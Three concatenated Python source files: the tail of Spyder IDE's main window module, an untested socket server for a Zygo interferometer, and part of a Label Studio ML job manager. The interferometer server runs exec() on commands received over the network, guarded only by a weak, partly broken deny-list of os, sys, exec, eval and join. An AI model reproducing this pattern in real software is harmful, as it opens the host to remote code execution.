action.setEnabled(True)
def update_search_menu(self):
"""Update search menu"""
# Disabling all actions except the last one
# (which is Find in files) to begin with
for child in self.search_menu.actions()[:-1]:
child.setEnabled(False)
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Find actions only trigger an effect in the Editor
if not console:
for action in self.search_menu.actions():
try:
action.setEnabled(True)
except RuntimeError:
pass
# Disable the replace action for read-only files
if len(self.search_menu_actions) > 3:
self.search_menu_actions[3].setEnabled(readwrite_editor)
def createPopupMenu(self):
return self.application.get_application_context_menu(parent=self)
def set_splash(self, message):
"""Set splash message"""
if self.splash is None:
return
if message:
logger.info(message)
self.splash.show()
self.splash.showMessage(message,
int(Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute),
QColor(Qt.white))
QApplication.processEvents()
def closeEvent(self, event):
"""closeEvent reimplementation"""
if self.closing(True):
event.accept()
else:
event.ignore()
def resizeEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.layouts.get_fullscreen_flag():
self.window_size = self.size()
QMainWindow.resizeEvent(self, event)
# To be used by the tour to be able to resize
self.sig_resized.emit(event)
def moveEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.layouts.get_fullscreen_flag():
self.window_position = self.pos()
QMainWindow.moveEvent(self, event)
# To be used by the tour to be able to move
self.sig_moved.emit(event)
def hideEvent(self, event):
"""Reimplement Qt method"""
try:
for plugin in (self.widgetlist + self.thirdparty_plugins):
# TODO: Remove old API
try:
# New API
if plugin.get_widget().isAncestorOf(
self.last_focused_widget):
plugin.change_visibility(True)
except AttributeError:
# Old API
if plugin.isAncestorOf(self.last_focused_widget):
plugin._visibility_changed(True)
QMainWindow.hideEvent(self, event)
except RuntimeError:
QMainWindow.hideEvent(self, event)
def change_last_focused_widget(self, old, now):
"""To keep track of to the last focused widget"""
if (now is None and QApplication.activeWindow() is not None):
QApplication.activeWindow().setFocus()
self.last_focused_widget = QApplication.focusWidget()
elif now is not None:
self.last_focused_widget = now
self.previous_focused_widget = old
def closing(self, cancelable=False):
"""Exit tasks"""
if self.already_closed or self.is_starting_up:
return True
if cancelable and CONF.get('main', 'prompt_on_exit'):
reply = QMessageBox.critical(self, 'Spyder',
'Do you really want to exit?',
QMessageBox.Yes, QMessageBox.No)
if reply == QMessageBox.No:
return False
if CONF.get('main', 'single_instance') and self.open_files_server:
self.open_files_server.close()
# Internal plugins
for plugin in (self.widgetlist + self.thirdparty_plugins):
# New API
try:
if isinstance(plugin, SpyderDockablePlugin):
plugin.close_window()
if not plugin.on_close(cancelable):
return False
except AttributeError:
pass
# Old API
try:
plugin._close_window()
if not plugin.closing_plugin(cancelable):
return False
except AttributeError:
pass
# New API: External plugins
for plugin_name, plugin in self._EXTERNAL_PLUGINS.items():
try:
if isinstance(plugin, SpyderDockablePlugin):
plugin.close_window()
if not plugin.on_close(cancelable):
return False
except AttributeError as e:
logger.error(str(e))
# Save window settings *after* closing all plugin windows, in order
# to show them in their previous locations in the next session.
# Fixes spyder-ide/spyder#12139
prefix = 'window' + '/'
self.layouts.save_current_window_settings(prefix)
self.already_closed = True
return True
def add_dockwidget(self, plugin):
"""
Add a plugin QDockWidget to the main window.
"""
try:
# New API
if plugin.is_compatible:
dockwidget, location = plugin.create_dockwidget(self)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
except AttributeError:
# Old API
if plugin._is_compatible:
dockwidget, location = plugin._create_dockwidget()
self.addDockWidget(location, dockwidget)
self.widgetlist.append(plugin)
@Slot()
def global_callback(self):
"""Global callback"""
widget = QApplication.focusWidget()
action = self.sender()
callback = from_qvariant(action.data(), to_text_string)
from spyder.plugins.editor.widgets.base import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
getattr(widget, callback)()
else:
return
def redirect_internalshell_stdio(self, state):
if state:
self.console.redirect_stds()
else:
self.console.restore_stds()
def open_external_console(self, fname, wdir, args, interact, debug, python,
python_args, systerm, post_mortem=False):
"""Open external console"""
if systerm:
# Running script in an external system terminal
try:
if CONF.get('main_interpreter', 'default'):
executable = get_python_executable()
else:
executable = CONF.get('main_interpreter', 'executable')
programs.run_python_script_in_terminal(
fname, wdir, args, interact, debug, python_args,
executable)
except NotImplementedError:
QMessageBox.critical(self, _("Run"),
_("Running an external system terminal "
"is not supported on platform %s."
) % os.name)
def execute_in_external_console(self, lines, focus_to_editor):
"""
Execute lines in IPython console and eventually set focus
to the Editor.
"""
console = self.ipyconsole
console.switch_to_plugin()
console.execute_code(lines)
if focus_to_editor:
self.editor.switch_to_plugin()
def open_file(self, fname, external=False):
"""
Open filename with the appropriate application
Redirect to the right widget (txt -> editor, spydata -> workspace, ...)
or open file outside Spyder (if extension is not supported)
"""
fname = to_text_string(fname)
ext = osp.splitext(fname)[1]
if encoding.is_text_file(fname):
self.editor.load(fname)
elif self.variableexplorer is not None and ext in IMPORT_EXT:
self.variableexplorer.import_data(fname)
elif not external:
fname = file_uri(fname)
start_file(fname)
def open_external_file(self, fname):
"""
Open external files that can be handled either by the Editor or the
variable explorer inside Spyder.
"""
# Check that file exists
fname = encoding.to_unicode_from_fs(fname)
if osp.exists(osp.join(CWD, fname)):
fpath = osp.join(CWD, fname)
elif osp.exists(fname):
fpath = fname
else:
return
# Don't open script that starts Spyder at startup.
# Fixes issue spyder-ide/spyder#14483
if sys.platform == 'darwin' and 'bin/spyder' in fname:
return
if osp.isfile(fpath):
self.open_file(fpath, external=True)
elif osp.isdir(fpath):
QMessageBox.warning(
self, _("Error"),
_('To open <code>{fpath}</code> as a project with Spyder, '
'please use <code>spyder -p "{fname}"</code>.')
.format(fpath=osp.normpath(fpath), fname=fname)
)
# --- Path Manager
# ------------------------------------------------------------------------
def load_python_path(self):
"""Load path stored in Spyder configuration folder."""
if osp.isfile(self.SPYDER_PATH):
path, _x = encoding.readlines(self.SPYDER_PATH)
self.path = tuple(name for name in path if osp.isdir(name))
if osp.isfile(self.SPYDER_NOT_ACTIVE_PATH):
not_active_path, _x = encoding.readlines(
self.SPYDER_NOT_ACTIVE_PATH)
self.not_active_path = tuple(name for name in not_active_path
if osp.isdir(name))
def save_python_path(self, new_path_dict):
"""
Save path in Spyder configuration folder.
`new_path_dict` is an OrderedDict that has the new paths as keys and
the state as values. The state is `True` for active and `False` for
inactive.
"""
path = [p for p in new_path_dict]
not_active_path = [p for p in new_path_dict if not new_path_dict[p]]
try:
encoding.writelines(path, self.SPYDER_PATH)
encoding.writelines(not_active_path, self.SPYDER_NOT_ACTIVE_PATH)
except EnvironmentError as e:
logger.error(str(e))
CONF.set('main', 'spyder_pythonpath', self.get_spyder_pythonpath())
def get_spyder_pythonpath_dict(self):
"""
Return Spyder PYTHONPATH.
The returned ordered dictionary has the paths as keys and the state
as values. The state is `True` for active and `False` for inactive.
Example:
OrderedDict([('/some/path', True), ('/some/other/path', False)])
"""
self.load_python_path()
path_dict = OrderedDict()
for path in self.path:
path_dict[path] = path not in self.not_active_path
for path in self.project_path:
path_dict[path] = True
return path_dict
def get_spyder_pythonpath(self):
"""
Return Spyder PYTHONPATH.
"""
path_dict = self.get_spyder_pythonpath_dict()
path = [k for k, v in path_dict.items() if v]
return path
def update_python_path(self, new_path_dict):
"""Update python path on Spyder interpreter and kernels."""
# Load previous path
path_dict = self.get_spyder_pythonpath_dict()
# Save path
if path_dict != new_path_dict:
# It doesn't include the project_path
self.save_python_path(new_path_dict)
# Load new path
new_path_dict_p = self.get_spyder_pythonpath_dict() # Includes project
# Update Spyder interpreter
for path in path_dict:
while path in sys.path:
sys.path.remove(path)
for path, active in reversed(new_path_dict_p.items()):
if active:
sys.path.insert(1, path)
# Any plugin that needs to do some work based on this signal should
# connect to it on plugin registration
self.sig_pythonpath_changed.emit(path_dict, new_path_dict_p)
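# Hedged illustration (plugin and slot names are assumptions): a plugin that
# needs to react to this change would typically connect on registration, e.g.
#     main_window.sig_pythonpath_changed.connect(plugin.on_pythonpath_changed)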
@Slot()
def show_path_manager(self):
"""Show path manager dialog."""
from spyder.widgets.pathmanager import PathManager
read_only_path = tuple(self.projects.get_pythonpath())
dialog = PathManager(self, self.path, read_only_path,
self.not_active_path, sync=True)
self._path_manager = dialog
dialog.sig_path_changed.connect(self.update_python_path)
dialog.redirect_stdio.connect(self.redirect_internalshell_stdio)
dialog.show()
def pythonpath_changed(self):
"""Project's PYTHONPATH contribution has changed."""
self.project_path = tuple(self.projects.get_pythonpath())
path_dict = self.get_spyder_pythonpath_dict()
self.update_python_path(path_dict)
#---- Preferences
def apply_settings(self):
"""Apply main window settings."""
qapp = QApplication.instance()
# Set 'gtk+' as the default theme in Gtk-based desktops
# Fixes spyder-ide/spyder#2036.
if is_gtk_desktop() and ('GTK+' in QStyleFactory.keys()):
try:
qapp.setStyle('gtk+')
except:
pass
default = self.DOCKOPTIONS
if CONF.get('main', 'vertical_tabs'):
default = default|QMainWindow.VerticalTabs
self.setDockOptions(default)
self.apply_panes_settings()
if CONF.get('main', 'use_custom_cursor_blinking'):
qapp.setCursorFlashTime(
CONF.get('main', 'custom_cursor_blinking'))
else:
qapp.setCursorFlashTime(self.CURSORBLINK_OSDEFAULT)
def apply_panes_settings(self):
"""Update dockwidgets features settings."""
for plugin in (self.widgetlist + self.thirdparty_plugins):
features = plugin.dockwidget.FEATURES
plugin.dockwidget.setFeatures(features)
try:
# New API
margin = 0
if CONF.get('main', 'use_custom_margin'):
margin = CONF.get('main', 'custom_margin')
plugin.update_margins(margin)
except AttributeError:
# Old API
plugin._update_margins()
@Slot()
def show_preferences(self):
"""Edit Spyder preferences."""
self.preferences.open_dialog(self.prefs_dialog_size)
def set_prefs_size(self, size):
"""Save preferences dialog size."""
self.prefs_dialog_size = size
# -- Open files server
def start_open_files_server(self):
self.open_files_server.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
port = select_port(default_port=OPEN_FILES_PORT)
CONF.set('main', 'open_files_port', port)
self.open_files_server.bind(('127.0.0.1', port))
self.open_files_server.listen(20)
while True:
try:
req, dummy = self.open_files_server.accept()
except socket.error as e:
# See spyder-ide/spyder#1275 for details on why errno EINTR is
# silently ignored here.
eintr = errno.WSAEINTR if os.name == 'nt' else errno.EINTR
# To avoid a traceback after closing on Windows
if e.args[0] == eintr:
continue
# handle a connection abort on close error
enotsock = (errno.WSAENOTSOCK if os.name == 'nt'
else errno.ENOTSOCK)
if e.args[0] in [errno.ECONNABORTED, enotsock]:
return
raise
fname = req.recv(1024)
fname = fname.decode('utf-8')
self.sig_open_external_file.emit(fname)
req.sendall(b' ')
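# Hedged illustration of the client side of this tiny protocol (names and
# the port lookup are assumptions; the port is stored in 'open_files_port'):
#     with socket.create_connection(('127.0.0.1', port)) as s:
#         s.sendall(fname.encode('utf-8'))
#         s.recv(1024)  # the server acknowledges with a single space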
# ---- Quit and restart, and reset spyder defaults
@Slot()
def reset_spyder(self):
"""
Quit and reset Spyder and then Restart application.
"""
answer = QMessageBox.warning(self, _("Warning"),
_("Spyder will restart and reset to default settings: <br><br>"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.restart(reset=True)
@Slot()
def restart(self, reset=False):
"""Wrapper to handle plugins request to restart Spyder."""
self.application.restart(reset=reset)
# ---- Interactive Tours
def show_tour(self, index):
"""Show interactive tour."""
self.layouts.maximize_dockwidget(restore=True)
frames = self.tours_available[index]
self.tour.set_tour(index, frames, self)
self.tour.start_tour()
# ---- Global Switcher
def open_switcher(self, symbol=False):
"""Open switcher dialog box."""
if self.switcher is not None and self.switcher.isVisible():
self.switcher.clear()
self.switcher.hide()
return
if symbol:
self.switcher.set_search_text('@')
else:
self.switcher.set_search_text('')
self.switcher.setup()
self.switcher.show()
# Note: The +6 pixel on the top makes it look better
# FIXME: Why is this using the toolbars menu? A: To not be on top of
# the toolbars.
# Probably toolbars should be taken into account for this 'delta' only
# when they are visible
delta_top = (self.toolbar.toolbars_menu.geometry().height() +
self.menuBar().geometry().height() + 6)
self.switcher.set_position(delta_top)
def open_symbolfinder(self):
"""Open symbol list management dialog box."""
self.open_switcher(symbol=True)
def create_switcher(self):
"""Create switcher dialog instance."""
if self.switcher is None:
from spyder.widgets.switcher import Switcher
self.switcher = Switcher(self)
return self.switcher
@Slot()
def show_tour_message(self, force=False):
"""
Show message about starting the tour the first time Spyder starts.
"""
should_show_tour = CONF.get('main', 'show_tour_message')
if force or (should_show_tour and not running_under_pytest()
and not get_safe_mode()):
CONF.set('main', 'show_tour_message', False)
self.tour_dialog = tour.OpenTourDialog(
self, lambda: self.show_tour(DEFAULT_TOUR))
self.tour_dialog.show()
# --- For OpenGL
def _test_setting_opengl(self, option):
"""Get the current OpenGL implementation in use"""
if option == 'software':
return QCoreApplication.testAttribute(Qt.AA_UseSoftwareOpenGL)
elif option == 'desktop':
return QCoreApplication.testAttribute(Qt.AA_UseDesktopOpenGL)
elif option == 'gles':
return QCoreApplication.testAttribute(Qt.AA_UseOpenGLES)
#==============================================================================
# Utilities for the 'main' function below
#==============================================================================
def create_application():
"""Create application and patch sys.exit."""
# Our QApplication
app = qapplication()
# --- Set application icon
app_icon = QIcon(get_image_path("spyder"))
app.setWindowIcon(app_icon)
# Required for correct icon on GNOME/Wayland:
if hasattr(app, 'setDesktopFileName'):
app.setDesktopFileName('spyder')
#----Monkey patching QApplication
class FakeQApplication(QApplication):
"""Spyder's fake QApplication"""
def __init__(self, args):
self = app # analysis:ignore
@staticmethod
def exec_():
"""Do nothing because the Qt mainloop is already running"""
pass
from qtpy import QtWidgets
QtWidgets.QApplication = FakeQApplication
# ----Monkey patching sys.exit
def fake_sys_exit(arg=[]):
pass
sys.exit = fake_sys_exit
# ----Monkey patching sys.excepthook to avoid crashes in PyQt 5.5+
def spy_excepthook(type_, value, tback):
sys.__excepthook__(type_, value, tback)
sys.excepthook = spy_excepthook
# Removing arguments from sys.argv as in standard Python interpreter
sys.argv = ['']
return app
def create_window(app, splash, options, args):
"""
Create and show Spyder's main window and start QApplication event loop.
"""
# Main window
main = MainWindow(splash, options)
try:
main.setup()
except BaseException:
if main.console is not None:
try:
main.console.exit_interpreter()
except BaseException:
pass
raise
main.pre_visible_setup()
main.show()
main.post_visible_setup()
if main.console:
namespace = CONF.get('internal_console', 'namespace', {})
main.console.start_interpreter(namespace)
main.console.set_namespace_item('spy', Spy(app=app, window=main))
# Propagate current configurations to all configuration observers
CONF.notify_all_observers()
# Don't show icons in menus for Mac
if sys.platform == 'darwin':
QCoreApplication.setAttribute(Qt.AA_DontShowIconsInMenus, True)
# Open external files with our Mac app
if running_in_mac_app():
app.sig_open_external_file.connect(main.open_external_file)
app._has_started = True
if hasattr(app, '_pending_file_open'):
if args:
args = app._pending_file_open + args
else:
args = app._pending_file_open
# Open external files passed as args
if args:
for a in args:
main.open_external_file(a)
# To give focus again to the last focused widget after restoring
# the window
app.focusChanged.connect(main.change_last_focused_widget)
if not running_under_pytest():
app.exec_()
return main
#==============================================================================
# Main
#==============================================================================
def main(options, args):
"""Main function"""
# **** For Pytest ****
if running_under_pytest():
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
app = create_application()
window = create_window(app, None, options, None)
return window
# **** Handle hide_console option ****
if options.show_console:
print("(Deprecated) --show console does nothing, now the default "
" behavior is to show the console, use --hide-console if you "
"want to hide it")
if set_attached_console_visible is not None:
set_attached_console_visible(not options.hide_console
or options.reset_config_files
or options.reset_to_defaults
or options.optimize
or bool(get_debug_level()))
# **** Set OpenGL implementation to use ****
# This attribute must be set before creating the application.
# See spyder-ide/spyder#11227
if options.opengl_implementation:
option = options.opengl_implementation
set_opengl_implementation(option)
else:
if CONF.get('main', 'opengl') != 'automatic':
option = CONF.get('main', 'opengl')
set_opengl_implementation(option)
# **** Set high DPI scaling ****
# This attribute must be set before creating the application.
if hasattr(Qt, 'AA_EnableHighDpiScaling'):
QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling,
CONF.get('main', 'high_dpi_scaling'))
# **** Set debugging info ****
setup_logging(options)
# **** Create the application ****
app = create_application()
# **** Create splash screen ****
splash = create_splash_screen()
if splash is not None:
splash.show()
splash.showMessage(
_("Initializing..."),
int(Qt.AlignBottom | Qt.AlignCenter | Qt.AlignAbsolute),
QColor(Qt.white)
)
QApplication.processEvents()
if options.reset_to_defaults:
# Reset Spyder settings to defaults
CONF.reset_to_defaults()
return
elif options.optimize:
# Optimize the whole Spyder's source code directory
import spyder
programs.run_python_script(module="compileall",
args=[spyder.__path__[0]], p_args=['-O'])
return
# **** Read faulthandler log file ****
faulthandler_file = get_conf_path('faulthandler.log')
previous_crash = ''
if osp.exists(faulthandler_file):
with open(faulthandler_file, 'r') as f:
previous_crash = f.read()
# Remove file to not pick it up for next time.
try:
dst = get_conf_path('faulthandler.log.old')
shutil.move(faulthandler_file, dst)
except Exception:
pass
CONF.set('main', 'previous_crash', previous_crash)
# **** Set color for links ****
set_links_color(app)
# **** Create main window ****
mainwindow = None
try:
if PY3 and options.report_segfault:
import faulthandler
with open(faulthandler_file, 'w') as f:
faulthandler.enable(file=f)
mainwindow = create_window(app, splash, options, args)
else:
mainwindow = create_window(app, splash, options, args)
except FontError:
QMessageBox.information(None, "Spyder",
"Spyder was unable to load the <i>Spyder 3</i> "
"icon theme. That's why it's going to fallback to the "
"theme used in Spyder 2.<br><br>"
"For that, please close this window and start Spyder again.")
CONF.set('appearance', 'icon_theme', 'spyder 2')
if mainwindow is None:
# An exception occurred
if splash is not None:
splash.hide()
return
ORIGINAL_SYS_EXIT()
if __name__ == "__main__":
main()
|
connectzygo.py
|
"""
Main function for setting up a Zygo interferometer as a remote server.
Not tested at this time. Module is not working!
Author: James Johnson
License: MIT
"""
import socket
import numpy as np
import time
import os
import logging
import threading
# setup logging for debug
logging.basicConfig(format='%(asctime)s - %(levelname)s - %(message)s', level=logging.INFO)
logger = logging.getLogger(__name__)
fhandle = logging.FileHandler('socket.log')
fhandle.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')
fhandle.setFormatter(formatter)
logger.addHandler(fhandle)
logger.debug('Starting connect4d.py')
"""Setup the Interferomter as a Server"""
padding = 8 # max number of digits of message length
class InterferometerServer:
def __init__(self, host_ip='127.0.0.1', port=50001):
""" Server Object which creates a listen on a separate thread"""
self.host_ip = host_ip
self.port = port
# self.alive = threading.Event()
# self.alive.set()
logger.debug('Starting InterferometerServer')
print("Starting InterferometerServer")
self.soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.soc.settimeout(200)
self.soc.bind((self.host_ip, self.port))
def listening(self):
self.soc.listen(1) # only one connecting process should be on the line
self.conn_handle = threading.Thread(target=self.handle_connection, args=())
self.conn_handle.start()
def handle_connection(self, remote_network=False):
""" Print a greeting message and wait for signal"""
#print('in _handle_connection()')
while True:
conn, addr = self.soc.accept()
logger.info('INCOMING CONNECTION FROM: {}'.format(addr[0]))
print('INCOMING CONNECTION FROM: {}'.format(addr[0]))
# print(f"Incoming connection from {addr[0]} port {addr[1]}")
# Check if external connection and refuse if remote_network is False
if addr[0][:3] not in ['127','192'] and remote_network is False:
msg = 'CONNECTION REFUSED'.encode('utf-8')
conn.send('{}'.format(len(msg)).rjust(padding, '0').encode('utf-8'))
conn.send(msg)
conn.close()
break
# Send Length of Message then message
msg='CONNECTION ESTABLISHED TO INTERFEROMETER'.encode('utf-8')
conn.send('{}'.format(len(msg)).rjust(padding, '0').encode('utf-8'))
conn.send(msg)
cmd = conn.recv(padding) # message length in DEC
cmd = conn.recv(int(cmd))
logger.info('RECEIVED COMMAND>> {%s}' % cmd.decode())
print('RECEIVED COMMAND>> %s' % cmd.decode())
if cmd.upper().decode() == 'CLOSE':
msg = 'CONNECTION CLOSED. SUCCESS: 0'.encode('utf-8')
conn.send('{}'.format(len(msg)).rjust(padding, '0').encode('utf-8'))
conn.send(msg)
conn.close()
break
elif cmd.decode():
cmdmsg = cmd.decode()
# Attempt to Prevent malicious code from executing
if cmdmsg[0:3] == 'os.' or cmdmsg[0:3] == 'sys.':
msg = 'COMMAND ERROR: RESTRICTED ACCESS TO OS and SYS MODULES'.encode('utf-8')
conn.send('{}'.format(len(msg)).rjust(padding, '0').encode('utf-8'))
conn.send(msg)
msg = '1'.encode('utf-8')
conn.send('{}'.format(len(msg)).rjust(padding, '0').encode('utf-8'))
conn.send(msg)
conn.close()
elif 'exec(' in cmdmsg or 'eval(' in cmdmsg:
msg = "COMMAND ERROR: RESTRICTED ACCESS TO EXEC and EVAL FUNCTIONS".encode('utf-8')
conn.send('{}'.format(len(msg)).rjust(padding, '0').encode('utf-8'))
conn.send(msg)
msg = '1'.encode('utf-8')
conn.send('{}'.format(len(msg)).rjust(padding, '0').encode('utf-8'))
conn.send(msg)
conn.close()
elif '.join(' in cmdmsg:
msg = "COMMAND ERROR: RESTRICTED ACCESS TO JOIN FUNCTION".encode('utf-8')
conn.send('{}'.format(len(msg)).rjust(padding, '0').encode('utf-8'))
conn.send(msg)
msg = '1'.encode('utf-8')
conn.send('{}'.format(len(msg)).rjust(padding, '0').encode('utf-8'))
conn.send(msg)
conn.close()
else:
""" Attempt to execute function on remote computer"""
try:
# exec() cannot rebind local variables in Python 3, so collect any
# 'dataresult' assignment through an explicit namespace instead.
exec_scope = {'dataresult': None}
exec(cmdmsg, globals(), exec_scope)
dataresult = exec_scope.get('dataresult')
if dataresult:
# If the statement returns a value, the code assumes it's data and will return the data file location
msg = "DATA".encode('utf-8')
conn.send('{}'.format(len(msg)).rjust(padding, '0').encode('utf-8'))
conn.send(msg)
msg = "{}".format(dataresult).encode('utf-8')
conn.send('{}'.format(len(msg)).rjust(padding, '0').encode('utf-8'))
conn.send(msg)
else:
msg = "NO RETURN DATA".encode('utf-8')
conn.send('{}'.format(len(msg)).rjust(padding, '0').encode('utf-8'))
conn.send(msg)
# Send success/fail code (0/1)
msg = '0'.encode('utf-8')
conn.send('{}'.format(len(msg)).rjust(padding, '0').encode('utf-8'))
conn.send(msg)
except TypeError:
msg = "COMMAND FAILED".encode('utf-8')
conn.send('{}'.format(len(msg)).rjust(padding, '0').encode('utf-8'))
conn.send(msg)
msg = '1'.encode('utf-8')
conn.send('{}'.format(len(msg)).rjust(padding, '0').encode('utf-8'))
conn.send(msg)
conn.close()
finally:
conn.close()
else:
conn.close()
self.soc.close()
print('Server Closed')
# logging.info('Server Closed')
return
if __name__ == "__main__":
srv = InterferometerServer()
srv.listening()
#
# def setup_server(ip_addr='127.0.0.1', port=50001):
# """Establishes a socket server at the provided address and port"""
# soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# soc.bind((ip_addr, port))
# print('Server Socket established at {} Port: {}'.format(ip_addr, port))
# soc.listen(1)
# soc.settimeout(120)
# return soc
#
# if __name__ == '__main__':
# soc = setup_server()
#
# while True:
#
# conn, addr = soc.accept()
# print(f'Incoming Connection from {addr}')
# conn.send('Connected to 4D Interferometer'.encode('utf-8'))
# try:
# data = conn.recv(1024)
# if data == b'hbt':
# conn.send(''.encode('utf-8'))
# elif data:
# try:
# exec(data)
# #conn.send(f'Executing {data}'.encode('utf-8'))
# print(f'Executing {data}')
# conn.send(f'1\n'.encode('utf-8'))
# except NameError:
# print(f'Cannot execute {data}. Closing Connection')
# #conn.send('Operation Failed'.encode('utf-8'))
# conn.send('0\n'.encode('utf-8'))
# else:
# break
# finally:
# time.sleep(.2)
# conn.send('Connection Closed'.encode('utf-8'))
# conn.close()
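# --- Hedged client-side sketch (illustrative only, not part of the original
# module). It shows how the 8-digit length-prefixed framing implemented by
# InterferometerServer above could be driven from another process. Host,
# port and the sample command are assumptions.
def example_client(host='127.0.0.1', port=50001, command='CLOSE'):
    """Send one framed command to InterferometerServer and print the replies."""
    def recv_msg(sock):
        # Read the fixed-width length prefix, then a payload of that length.
        # (A robust client would loop until all expected bytes are received.)
        length = int(sock.recv(padding).decode('utf-8'))
        return sock.recv(length).decode('utf-8')
    def send_msg(sock, text):
        payload = text.encode('utf-8')
        sock.send('{}'.format(len(payload)).rjust(padding, '0').encode('utf-8'))
        sock.send(payload)
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.connect((host, port))
        print(recv_msg(sock))  # greeting, e.g. 'CONNECTION ESTABLISHED ...'
        send_msg(sock, command)
        print(recv_msg(sock))  # status reply from the server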
|
model.py
|
import os
import logging
import sys
import time
import json
import redis
import attr
import io
try:
import torch.multiprocessing as mp
try:
mp.set_start_method('spawn')
except RuntimeError:
pass
except ImportError:
import multiprocessing as mp
import importlib
import importlib.util
import inspect
from typing import Dict
from abc import ABC, abstractmethod
from datetime import datetime
from itertools import tee
from contextlib import contextmanager
from redis import Redis
from rq import Queue, get_current_job
from rq.registry import StartedJobRegistry, FinishedJobRegistry, FailedJobRegistry
from rq.job import Job
from colorama import Fore
from label_studio_tools.core.utils.params import get_bool_env
from label_studio_tools.core.label_config import parse_config
from label_studio_tools.core.utils.io import get_local_path
logger = logging.getLogger(__name__)
@attr.s
class ModelWrapper(object):
model = attr.ib()
model_version = attr.ib()
is_training = attr.ib(default=False)
class JobManager(object):
"""Job Manager provides a facility to spin up background jobs for LabelStudioMLBase models"""
def get_result(self, model_version=None):
"""Return job result based on specified model_version (=job_id)"""
job_result = None
if model_version:
logger.debug(f'Get result based on model_version={model_version}')
try:
job_result = self.get_result_from_job_id(model_version)
except Exception as exc:
logger.error(exc, exc_info=True)
else:
logger.debug(f'Get result from last valid job')
job_result = self.get_result_from_last_job()
return job_result or {}
def job(self, model_class, event: str, data: Dict, job_id: str):
"""
Job function to be run in background. It actually does the following:
1. Creates model_class instance, possibly by using artefacts from previously finished jobs
2. Calls model_class.process_event() method
:param model_class: LabelStudioMLBase instance
:param event: event name (e.g. Label Studio webhook action name)
:param data: job data (e.g. Label Studio webhook payload)
:param job_id: user-defined job identifier
:return: json-serializable job result
"""
with self.start_run(event, data, job_id):
model_version = data.get('model_version') or data.get('project', {}).get('model_version')
job_result = self.get_result(model_version)
label_config = data.get('label_config') or data.get('project', {}).get('label_config')
train_output = job_result.get('train_output')
logger.debug(f'Load model with label_config={label_config} and train_output={train_output}')
model = model_class(label_config=label_config, train_output=train_output)
additional_params = self.get_additional_params(event, data, job_id)
result = model.process_event(event, data, job_id, additional_params)
self.post_process(event, data, job_id, result)
logger.debug(f'Finished processing event {event}! Return result: {result}')
return result
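# Hedged usage sketch (model class and payload names are illustrative): a
# concrete manager launches this method in the background via run_job(), e.g.
#     manager.run_job(MyModel, args=('ANNOTATION_CREATED', webhook_payload, job_id))
# The args tuple is unpacked into (event, data, job_id) by the manager's
# run_job() implementation.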
def get_additional_params(self, event, data, job_id):
"""Dict with aux parameters required to run process_event()"""
return {}
@contextmanager
def start_run(self, event, data, job_id):
"""Context manager that can be used to create a separate 'run':
Useful to perform ML tracking, i.e. by creating a separate workspace for each job call.
For example, it could be implemented with MLFlow:
```python
with mlflow.start_run() as run:
yield run
```
"""
raise NotImplementedError
def get_result_from_job_id(self, job_id):
"""This is the actual function should be used further to ensure 'job_id' is included in results.
DON'T OVERRIDE THIS FUNCTION! Instead, override _get_result_from_job_id
"""
result = self._get_result_from_job_id(job_id)
assert isinstance(result, dict)
result['job_id'] = job_id
return result
def _get_result_from_job_id(self, job_id):
"""Return job result by job id"""
raise NotImplementedError
def iter_finished_jobs(self):
raise NotImplementedError
def get_result_from_last_job(self, skip_empty_results=True):
"""Return job result by last successfully finished job
when skip_empty_results is True, result is None are skipped (e.g. if fit() function makes `return` call)
"""
for job_id in self.iter_finished_jobs():
logger.debug(f'Try job_id={job_id}')
try:
result = self.get_result_from_job_id(job_id)
except Exception as exc:
logger.error(f'{job_id} job returns exception: {exc}', exc_info=True)
continue
if skip_empty_results and result is None:
logger.debug(f'Skip empty result from job {job_id}')
continue
return result
# if nothing found - return empty result
return
def post_process(self, event, data, job_id, result):
"""Post-processing hook after calling process_event()"""
raise NotImplementedError
def run_job(self, model_class, args: tuple):
"""Defines the logic to run job() in background"""
raise NotImplementedError
class SimpleJobManager(JobManager):
"""Simple Job Manager doesn't require additional dependencies
and uses a native python multiprocessing for running job in background.
Job results / artefacts are stored as ordinary files, inside user-defined model directory:
model_dir:
|_ job_id
|_ event.json
|_ job_result.json
|_ artefacts.bin
Note that this job manager should be used only for development purposes.
"""
JOB_RESULT = 'job_result.json' # file name under each job dir where the job result is stored
def __init__(self, model_dir='.'):
self.model_dir = model_dir
@contextmanager
def start_run(self, event, data, job_id):
job_dir = self._job_dir(job_id)
os.makedirs(job_dir, exist_ok=True)
with open(os.path.join(job_dir, 'event.json'), mode='w') as f:
event_data = {'event': event, 'job_id': job_id}
if data:
event_data['data'] = data
json.dump(event_data, f, indent=2)
yield job_dir
def _job_dir(self, job_id):
return os.path.join(self.model_dir, str(job_id))
def get_additional_params(self, event, data, job_id):
return {'workdir': self._job_dir(job_id)}
def _get_result_from_job_id(self, job_id):
"""
Return job result or {}
@param job_id: Job id (also known as model version)
@return: dict
"""
job_dir = self._job_dir(job_id)
if not os.path.exists(job_dir):
logger.warning(f"=> Warning: {job_id} dir doesn't exist. "
f"It seems that you don't have specified model dir.")
return None
result_file = os.path.join(job_dir, self.JOB_RESULT)
if not os.path.exists(result_file):
logger.warning(f"=> Warning: {job_id} dir doesn't contain result file. "
f"It seems that previous training session ended with error.")
return None
logger.debug(f'Read result from {result_file}')
with open(result_file) as f:
result = json.load(f)
return result
def iter_finished_jobs(self):
logger.debug(f'Try fetching last valid job id from directory {self.model_dir}')
